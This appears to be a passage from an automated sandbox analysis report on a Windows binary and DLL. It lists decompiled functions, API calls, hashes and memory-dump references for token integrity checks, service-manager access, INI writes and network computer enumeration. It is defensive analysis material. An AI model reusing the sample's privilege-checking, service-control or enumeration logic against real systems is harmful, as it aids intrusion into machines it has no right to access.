                                                                                                                        0x6f33332c
                                                                                                                        0x6f33332c
                                                                                                                        0x6f33333a
                                                                                                                        0x6f333342
                                                                                                                        0x6f33334a
                                                                                                                        0x6f33335b
                                                                                                                        0x6f33335b
                                                                                                                        0x6f333366
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f333311
                                                                                                                        0x6f33336a
                                                                                                                        0x6f333371
                                                                                                                        0x6f333371
                                                                                                                        0x6f33337c
                                                                                                                        0x6f33337d
                                                                                                                        0x6f333385
                                                                                                                        0x6f333385

                                                                                                                        APIs
                                                                                                                        • OpenProcessToken.ADVAPI32(000000FF,0000000A,?), ref: 6F3332A1
                                                                                                                        • GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?), ref: 6F3332E9
                                                                                                                        • GetTokenInformation.ADVAPI32(00000000,00000013(TokenIntegrityLevel),?,00000004,?), ref: 6F333309
                                                                                                                        • DuplicateToken.ADVAPI32(?,00000001,00000000), ref: 6F33331F
                                                                                                                        • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,00000000), ref: 6F333342
                                                                                                                        • CheckTokenMembership.ADVAPI32(00000000,00000044,?), ref: 6F33335B
                                                                                                                        • FindCloseChangeNotification.KERNEL32(00000000), ref: 6F333366
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 6F333371
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Token$CloseInformation$ChangeCheckCreateDuplicateFindHandleKnownMembershipNotificationOpenProcessWell
                                                                                                                        • String ID: D
                                                                                                                        • API String ID: 1214873377-2746444292
                                                                                                                        • Opcode ID: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction ID: 08229b83593daad8b88303d06cb7f4518142c8a9b4845ba5e457421a3d9ed692
                                                                                                                        • Opcode Fuzzy Hash: 95ce5302a3ffa341f835a9ce00990153fd751b37e9d32edb9403e30a9cf9ebc0
                                                                                                                        • Instruction Fuzzy Hash: 323118B2548349AFD710DB54C845FABB7E9BBC4B24F00C90DF5A587280DB75E509CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3369C0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 69COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 91%
                                                                                                                        			E6F3369C0(CHAR* _a4, signed int _a8, intOrPtr _a12, signed char _a16) {
				char _v8;
				char _v11;
				char _v12;
				short _v15;
				char _v16;
				CHAR* _t19;
				CHAR* _t21;
				CHAR* _t22;
				CHAR* _t24;
				signed char _t26;
				signed int _t27;
				CHAR* _t30;
				int _t31;
				CHAR* _t35;
				CHAR* _t39;
				CHAR* _t40;
				CHAR* _t43;
				CHAR* _t46;
				CHAR* _t48;

				_t19 = M6F3404CC; // 0xa32d38
				_t40 = M6F3404DC; // 0xa55ca8
				_t46 = _a4;
				_v16 = 0x6e6468;
				WritePrivateProfileStringA(_t40,  &_v16, _t46, _t19);
				_t21 = M6F3404CC; // 0xa32d38
				_t22 = M6F3404DC; // 0xa55ca8
				asm("sbb ecx, ecx");
				_t35 =  ~_t46 & _a8;
				_v15 = 0x70;
				WritePrivateProfileStringA(_t22,  &_v16, _t35, _t21); // executed
				_t24 = M6F3404CC; // 0xa32d38
				asm("sbb esi, esi");
				_t48 =  ~_t46 &  &_v12;
				_t43 = M6F3404DC; // 0xa55ca8
				_v12 = (_t35 & 0xffffff00 | _a12 != 0x00000000) + 0x30;
				_v11 = 0;
				_v15 = 0x73;
				WritePrivateProfileStringA(_t43,  &_v16, _t48, _t24); // executed
				_t26 = _a16;
				_v15 = 0x74;
				_t27 = _t26 & 0x000000ff;
				if(_t26 == 0) {
					_t27 = 0xc;
				}
				wsprintfA( &_v12, "%d", _t27);
				_t39 = M6F3404CC; // 0xa32d38
				_t30 = M6F3404DC; // 0xa55ca8
				_t31 = WritePrivateProfileStringA(_t30,  &_v8, _t48, _t39); // executed
				return _t31;
			}






















                                                                                                                        0x6f3369c3
                                                                                                                        0x6f3369c8
                                                                                                                        0x6f3369cf
                                                                                                                        0x6f3369e2
                                                                                                                        0x6f3369ea
                                                                                                                        0x6f3369ec
                                                                                                                        0x6f3369f6
                                                                                                                        0x6f3369fb
                                                                                                                        0x6f3369fd
                                                                                                                        0x6f336a08
                                                                                                                        0x6f336a0d
                                                                                                                        0x6f336a14
                                                                                                                        0x6f336a21
                                                                                                                        0x6f336a28
                                                                                                                        0x6f336a2a
                                                                                                                        0x6f336a30
                                                                                                                        0x6f336a3b
                                                                                                                        0x6f336a40
                                                                                                                        0x6f336a45
                                                                                                                        0x6f336a47
                                                                                                                        0x6f336a4d
                                                                                                                        0x6f336a54
                                                                                                                        0x6f336a57
                                                                                                                        0x6f336a59
                                                                                                                        0x6f336a59
                                                                                                                        0x6f336a69
                                                                                                                        0x6f336a6f
                                                                                                                        0x6f336a75
                                                                                                                        0x6f336a85
                                                                                                                        0x6f336a8c

                                                                                                                        APIs
                                                                                                                        • WritePrivateProfileStringA.KERNEL32 ref: 6F3369EA
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,00A32D38,?,00A32D38), ref: 6F336A0D
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336A45
                                                                                                                        • wsprintfA.USER32 ref: 6F336A69
                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00A55CA8,?,?,00A32D38), ref: 6F336A85
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: PrivateProfileStringWrite$wsprintf
                                                                                                                        • String ID: hdn$s$t
                                                                                                                        • API String ID: 2965074233-1328931711
                                                                                                                        • Opcode ID: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction ID: 9e41e9caa8fadecac9bba49ffb96c8628ed8ed4e22ab71a04489e46710e73c76
                                                                                                                        • Opcode Fuzzy Hash: ba7cde9e3ccb53eba172b25025cc109a76ca66833ef81076cdb2dbccae7153a1
                                                                                                                        • Instruction Fuzzy Hash: C62183B22186929FD700DF58C844E6BB7EDEFD5214F058A0CF49493241D674AA1CCBA2
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00542E64, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 36libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • TlsGetValue.KERNEL32(0054B9C9,0054BA49,0054B9C9,00000014,005445B6,00000000,00000FA0,007D5C28,0000000C,00544615,005343D6,?,?,00538380,00000004,007D5840), ref: 00542E71
                                                                                                                        • TlsGetValue.KERNEL32(00000005,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E88
                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32.DLL,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542E9D
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00542EB8
                                                                                                                        • RtlEncodePointer.NTDLL(005343D6,?,00538380,00000004,007D5840,0000000C,00540F8F,005343D6,005343D6,00000000,00000000,00000000,005430DD,00000001,00000214), ref: 00542EC6
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$AddressEncodeHandleModulePointerProc
                                                                                                                        • String ID: EncodePointer$KERNEL32.DLL
                                                                                                                        • API String ID: 3030820695-3682587211
                                                                                                                        • Opcode ID: 3c1b2cc9ebb13ff48419e98e0aa28776d5d5d2e560a5a0a2d62f95d7005b5ed6
                                                                                                                        • Instruction ID: c32475e9bb3011c43e3d726bfe0c4be720bbed855a4fa3e209220d96b0486d0c
                                                                                                                        • Opcode Fuzzy Hash: 3c1b2cc9ebb13ff48419e98e0aa28776d5d5d2e560a5a0a2d62f95d7005b5ed6
                                                                                                                        • Instruction Fuzzy Hash: 6FF090305006239B8B21AB26DC049FB3EACBF05369F948521F818E32B4DB30DD528E61
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00548CC0, Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 220COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: __sopen_s
                                                                                                                        • String ID: $UNICODE$UTF-16LE$UTF-8$ccs=
                                                                                                                        • API String ID: 2693426323-1656882147
                                                                                                                        • Opcode ID: c955d2a49e52624743202981dae0fee359524b91ec3472679bd1332280690614
                                                                                                                        • Instruction ID: 702510e495a5f5bcef536d03d161e1d4473855560d6e63228f09bd41f4b00816
                                                                                                                        • Opcode Fuzzy Hash: c955d2a49e52624743202981dae0fee359524b91ec3472679bd1332280690614
                                                                                                                        • Instruction Fuzzy Hash: F271EEB1C04209EEDB288F5984493FD7FA8BF1431CF64C42AEC5AA7191EF788A559F04
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004BB05F, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140networkCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004BB07E
                                                                                                                        • _memset.LIBCMT ref: 004BB09B
                                                                                                                        • gethostname.WS2_32(00000000,00000100), ref: 004BB0AC
                                                                                                                        • gethostbyname.WS2_32(00000000), ref: 004BB0BE
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004A32EF: __EH_prolog3.LIBCMT ref: 004A32F6
                                                                                                                          • Part of subcall function 004A1BF0: __EH_prolog3.LIBCMT ref: 004A1BF7
                                                                                                                          • Part of subcall function 004A1BF0: EnterCriticalSection.KERNEL32(?,00000004,004BE3C7,00000000,0077C1F8,00000000,000001F8,?,?,?,0044D2A4,00000002), ref: 004A1C05
                                                                                                                          • Part of subcall function 004A1BF0: LeaveCriticalSection.KERNEL32(?,?,?,?,0044D2A4,00000002), ref: 004A1C45
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                        • inet_ntoa.WS2_32(?), ref: 004BB138
                                                                                                                        Strings
                                                                                                                        • GetHostIP: gethostname failed: , xrefs: 004BB1B0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalSection$DeleteEnterInitializeLeave_memsetgethostbynamegethostnameinet_ntoa
                                                                                                                        • String ID: GetHostIP: gethostname failed:
                                                                                                                        • API String ID: 3857270832-1828764501
                                                                                                                        • Opcode ID: cad11669c8fd95806aecbcab5cc602f3a6a5a21084eae9d589220352f58aea40
                                                                                                                        • Instruction ID: 349d24c978153597acb0d294641d772a813f79802d0ed2e9a0d1a9c9ba429b22
                                                                                                                        • Opcode Fuzzy Hash: cad11669c8fd95806aecbcab5cc602f3a6a5a21084eae9d589220352f58aea40
                                                                                                                        • Instruction Fuzzy Hash: 6251A171C00148AFDB10EFA8C856AEDBBB4AF65304F14415EE052AB291EBB85B08C7A5
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 0050C179, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 123COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3_catch.LIBCMT ref: 0050C180
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004A17BA: __EH_prolog3.LIBCMT ref: 004A17C1
                                                                                                                          • Part of subcall function 004A17BA: DeleteCriticalSection.KERNEL32(?,00000004,004BE908,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17DC
                                                                                                                          • Part of subcall function 005343B9: _malloc.LIBCMT ref: 005343D1
                                                                                                                        • _memset.LIBCMT ref: 0050C1EF
                                                                                                                          • Part of subcall function 0050BFDE: __EH_prolog3_catch.LIBCMT ref: 0050BFE5
                                                                                                                          • Part of subcall function 0050BFDE: WNetOpenEnumW.MPR(?,?,?,?,?), ref: 0050C04A
                                                                                                                          • Part of subcall function 0050BFDE: SetLastError.KERNEL32(00000000,00000060,0050C216,00000000,00000002), ref: 0050C059
                                                                                                                          • Part of subcall function 0050BFDE: WNetEnumResourceW.MPR(?,00000001,00000000,00000002), ref: 0050C06B
                                                                                                                          • Part of subcall function 0050BFDE: WNetCloseEnum.MPR(?), ref: 0050C0AF
                                                                                                                          • Part of subcall function 0040E968: __EH_prolog3.LIBCMT ref: 0040E96F
                                                                                                                          • Part of subcall function 004C5619: __EH_prolog3_catch.LIBCMT ref: 004C563B
                                                                                                                          • Part of subcall function 004A1784: __EH_prolog3.LIBCMT ref: 004A178B
                                                                                                                          • Part of subcall function 004A1784: InitializeCriticalSection.KERNEL32(?,00000004,004BE363,000001F8,?,?,?,0044D2A4,00000002), ref: 004A17A0
                                                                                                                          • Part of subcall function 004E19D6: __EH_prolog3.LIBCMT ref: 004E19DD
                                                                                                                          • Part of subcall function 004E019F: __EH_prolog3.LIBCMT ref: 004E01AA
                                                                                                                          • Part of subcall function 004DE5E2: __EH_prolog3.LIBCMT ref: 004DE5E9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$CriticalEnumH_prolog3_catchSection$Initialize$CloseDeleteErrorLastOpenResource_malloc_memset
                                                                                                                        • String ID: CommercialUse$EnumComputers.0$EnumComputers.1$EnumComputersThread
                                                                                                                        • API String ID: 3123197802-1530958834
                                                                                                                        • Opcode ID: c67ade20e242b273d92bbccb45b075de57fc47d6366505db761b060cc9a17596
                                                                                                                        • Instruction ID: 05e0eff4078664633abe1d444c0b6dbc70219798da1c869670169f2c63a0688f
                                                                                                                        • Opcode Fuzzy Hash: c67ade20e242b273d92bbccb45b075de57fc47d6366505db761b060cc9a17596
                                                                                                                        • Instruction Fuzzy Hash: A541E870900388AADB10EBB58956BEDBFA5BF52308F20456EE1427B2C2DB791F44C756
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 004EA042, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 50threadCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • __EH_prolog3.LIBCMT ref: 004EA049
                                                                                                                        • CreateThread.KERNEL32 ref: 004EA071
                                                                                                                        • InterlockedIncrement.KERNEL32(0085F708), ref: 004EA0AA
                                                                                                                          • Part of subcall function 004A1B0C: __EH_prolog3.LIBCMT ref: 004A1B13
                                                                                                                          • Part of subcall function 004A1B0C: InitializeCriticalSection.KERNEL32(?,00000004,004B59A0,00747890,00000000), ref: 004A1B28
                                                                                                                          • Part of subcall function 004378AA: __EH_prolog3.LIBCMT ref: 004378B1
                                                                                                                        • ResumeThread.KERNEL32(?,0000002C,004DD255,?), ref: 004EA0CD
                                                                                                                        Strings
                                                                                                                        • Thread.Create.Failed, xrefs: 004EA088
                                                                                                                        • CreateThread, not running yet, xrefs: 004EA0B1
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.747256468.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.747207388.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749415979.0000000000733000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749762818.0000000000805000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749786800.0000000000807000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749814867.000000000080B000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749828681.000000000080C000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749850510.000000000080D000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749873568.000000000080F000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749896361.0000000000810000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749924742.0000000000813000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749958556.0000000000817000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.749980954.0000000000818000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750019968.0000000000822000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750062782.0000000000823000.00000008.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750089388.0000000000826000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.750421700.00000000008B2000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: H_prolog3$Thread$CreateCriticalIncrementInitializeInterlockedResumeSection
                                                                                                                        • String ID: CreateThread, not running yet$Thread.Create.Failed
                                                                                                                        • API String ID: 3859527013-1474816145
                                                                                                                        • Opcode ID: 7a8d0bc91cd5e1aa6a3b15c91ec62c85d04e2f3e2a1a1d76356f4bc47ff17842
                                                                                                                        • Instruction ID: 748b0913021fcb97cc79a03ea8ed07f168fa6b075067c64e1e9f7b92f0b2e480
                                                                                                                        • Opcode Fuzzy Hash: 7a8d0bc91cd5e1aa6a3b15c91ec62c85d04e2f3e2a1a1d76356f4bc47ff17842
                                                                                                                        • Instruction Fuzzy Hash: DD110830900241ABDB30EF66DC0996E7F71FF95722F10420EF122961E0DB786901D71A
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 6F3338A0, Relevance: 9.1, APIs: 6, Instructions: 63serviceCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        C-Code - Quality: 94%
                                                                                                                        			E6F3338A0(char* _a4, char** _a8, int _a12, signed int _a16) {
				char* _t5;
				void* _t14;
				int _t19;
				void* _t24;
				void* _t25;
				signed int _t27;

				_t19 = 0;
				_t5 = OpenSCManagerA(0, 0, 0xf003f); // executed
				_t25 = _t5;
				if(_t25 != 0) {
					L2:
					_t27 = _a16;
					asm("sbb eax, eax");
					_t24 = OpenServiceA(_t25, _a4, ( ~_t27 & 0xfff0fe05) + 0xf01ff);
					if(_t24 == 0) {
						L6:
						CloseServiceHandle(_t25);
						goto L7;
					} else {
						if(_t27 != 0) {
							_t19 = 1;
							goto L6;
						} else {
							_t14 = E6F3337D0(_t24, _a8, _a12);
							CloseServiceHandle(_t24);
							CloseServiceHandle(_t25);
							return _t14;
						}
					}
				} else {
					_t25 = OpenSCManagerA(_t5, _t5, 1);
					if(_t25 == 0) {
						L7:
						return _t19;
					} else {
						goto L2;
					}
				}
			}









                                                                                                                        0x6f3338ae
                                                                                                                        0x6f3338b2
                                                                                                                        0x6f3338b4
                                                                                                                        0x6f3338b8
                                                                                                                        0x6f3338c6
                                                                                                                        0x6f3338cb
                                                                                                                        0x6f3338d3
                                                                                                                        0x6f3338e8
                                                                                                                        0x6f3338ec
                                                                                                                        0x6f333921
                                                                                                                        0x6f333922
                                                                                                                        0x00000000
                                                                                                                        0x6f3338ee
                                                                                                                        0x6f3338f0
                                                                                                                        0x6f33391c
                                                                                                                        0x00000000
                                                                                                                        0x6f3338f2
                                                                                                                        0x6f3338fd
                                                                                                                        0x6f333908
                                                                                                                        0x6f33390f
                                                                                                                        0x6f33391b
                                                                                                                        0x6f33391b
                                                                                                                        0x6f3338f0
                                                                                                                        0x6f3338ba
                                                                                                                        0x6f3338c0
                                                                                                                        0x6f3338c4
                                                                                                                        0x6f33392b
                                                                                                                        0x6f33392e
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x00000000
                                                                                                                        0x6f3338c4

                                                                                                                        APIs
                                                                                                                        • OpenSCManagerA.SECHOST(00000000,00000000,000F003F,00000000,00000000,00000000,6F33709F,00A55CD8,00000000,00000000,00000001,?,00000000), ref: 6F3338B2
                                                                                                                        • OpenSCManagerA.ADVAPI32(00000000,00000000,00000001), ref: 6F3338BE
                                                                                                                        • OpenServiceA.ADVAPI32(00000000,?,?,?), ref: 6F3338E2
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000,00000000,00000000,00000000), ref: 6F333908
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F33390F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 6F333922
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000003.00000002.754490413.000000006F331000.00000020.00020000.sdmp, Offset: 6F330000, based on PE: true
                                                                                                                        • Associated: 00000003.00000002.754474115.000000006F330000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754512937.000000006F33D000.00000002.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754530015.000000006F340000.00000004.00020000.sdmp Download File
                                                                                                                        • Associated: 00000003.00000002.754546355.000000006F341000.00000002.00020000.sdmp Download File
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandleOpen$Manager
                                                                                                                        • String ID:
